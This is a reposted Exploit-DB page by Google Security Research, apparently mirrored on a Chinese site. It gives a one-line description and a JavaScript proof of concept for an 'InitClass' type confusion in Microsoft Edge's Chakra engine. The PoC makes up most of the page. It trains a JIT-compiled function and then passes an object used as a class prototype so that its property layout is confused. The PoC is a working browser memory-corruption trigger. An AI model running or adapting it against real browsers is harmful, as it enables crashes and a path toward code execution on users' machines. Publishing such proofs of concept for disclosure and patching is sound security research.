Microsoft Edge Chakra – ‘InitClass’ Type Confusion - 体验盒子

作者： Google Security Research

日期： 2019-01-18

类别：

dos

平台：

windows

来源：https://www.exploit-db.com/exploits/46204/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

/*

Issue description

This is similar toissue 1702 (https://www.exploit-db.com/exploits/46203) . This time, it uses an InitClass instruction to reach the SetIsPrototype method.

PoC:

*/

function opt(o, c, value) {

o.b = 1;

class A extends c {

}

o.a = value;

}

function main() {

for (let i = 0; i < 2000; i++) {

let o = {a: 1, b: 2};

opt(o, (function () {}), {});

}

let o = {a: 1, b: 2};

let cons = function () {};

cons.prototype = o;

opt(o, cons, 0x1234);

print(o.a);

}

main();